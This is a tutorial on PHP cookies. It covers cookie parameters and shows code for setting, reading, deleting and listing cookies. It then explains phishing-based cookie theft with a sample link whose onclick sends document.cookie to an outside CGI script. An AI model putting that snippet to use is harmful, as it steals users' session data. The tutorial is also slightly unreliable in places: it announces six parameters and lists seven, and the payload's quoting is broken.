php cookies

The How-to and Why with Examples

Most people know very little about Internet cookies. They are small bits of text based data held on the web user’s computer which allow web pages to save bits of data about the user’s web visit or account. The reason they are necessary is to allow user data to persist and thus make longer more intelligent web based user interaction operations possible. There are 6 PHP cookie parameters:
  1. Name – The name of the cookie.
  2. Value – The value of the cookie.
  3. Expiration – The expiration Datetime of the cookie.
  4. Path – The domain path of the cookie. Using ‘/’ designates all paths.
  5. Domain – The domain if limited.
  6. Secure – Flag designating it should be sent to user over secure connection only.
  7. HTTPOnly – Flag designating that PHP should send the httponly flag. This flag makes any browser cookies from the site unreadable to JavaScript if set.
Cookies can only be created in the same domain the response object lives. If the expiration date is not entered during cookie creation, the cookie becomes a session cookie and will live only during the life of the browser session. After the browser is shut down the cookie will be destroyed. If an expiration date is set then the cookie becomes a persistent cookie and lives until the expiration datetime is surpassed, upon which time it will be destroyed. Cookies can be read only on the domain they were created except for the Adobe Flash Cookie.

PHP Cookie Methods and Persistence

Setting a cookie is quite easy in PHP:
$userid = "25E85*#k59SMK";
// set user cookie expiring in 24 hours
setcookie("userid",$userid, time()+3600*24);
‘Persistent’ cookies are cookies that will live longer than the life of the browser. When the browser is shut down, the persistent cookie will still reside on the machine until it reaches its expiration date. There are two methods of reading a cookie. The programmer can make use of the predefined variable in PHP called $HTTP_COOKIE_VARS or simply use the shorter form variable $_COOKIE.
// read cookie
if(isset($_COOKIE["userid"]))
{
$userid=$_COOKIE["userid"];
}
// read cookie
if(isset($HTTP_COOKIE_VARS["userid"]))
{
$userid=$HTTP_COOKIE_VARS["userid"];
}
To delete a cookie, the programmer simply sets the expiration date to some point in time that has already passed. The cookie is then deleted or destroyed.
// delete a cookie
setcookie("userid",$userid, time()-3600*24);

How To Print All Cookies or Delete All Cookies

Combining the methods above with a small amount of PHP code allows the webmaster to print out all existing cookies:
// print all cookies
$count = count($_COOKIE);
print(" <pre> \n");
print("$count cookies found.\n");
foreach ($_COOKIE as $name => $value)
{
print "<font color="#0066ff">$name</font> = <font color="#cc6633">
$value</font>\n";
}
print("</pre> \n");
delete all cookies
foreach($_COOKIE as $name => $value)
{
setcookie($name,$value,time()-3600*24);
}

How can a Web User’s Cookies and Session Variables Be Viewed By a Phishing Website

Cookies cannot be directly viewed by a website. There is however an exploit whereby a website can take a snapshot of a web user’s cookies by getting the web user to perform a quick action without thinking. There are many opportunities online where users can be presented a message with a link to click on. This can be online bulletin boards, messaging programs, emails, popup advertisements, etc. When a user receives a message, the sender is not recognized, and there is a clickable link in the message: this could be and probably is an exploit to get personal information. Here is how it works. The user is presented with a communication with a link such as:
<a href='#' 
onclick='window.location='http://www.wikiwebpedia.com/takeusercookies.
cgi?text='+escape(document.cookie); 
return false;">We have been looking for you. 
Click Here to claim your $500,000.00 inheritance!</a>
The presentation, message, and theme will all be geared toward getting the user to click the link very fast. This will usually be stated as a one time offer, expiring in x number of days, etc. If the user clicks the link and the above script is executed, reads and saves the user’s personal cookie and session data from their machine and then redirect the user to a page immediately which talks about the original offer. The act of having personal information stolen will take place so fast, it will be completely unnoticeable. It is good practice to never click on a link from a company or user that is unknown.

Cookie Benefits and Precautions

Cookies can reduce trips to the database and enrich the user experience by persisting user selections in a safe manner as long as basic website security is kept in mind by the webmaster. Any cookie which holds personal information should be encrypted with a key-based encryption algorithm for added security. The cookie data in question is readable on the user machine only, although users are more apt to visit multiple sites and if a malicious website is visited while the cookies exist, they can be compromised. A faster and more intuitive website greatly adds to the overall user experience and may make the difference between a web user just passing through or becoming a customer and regular visitor.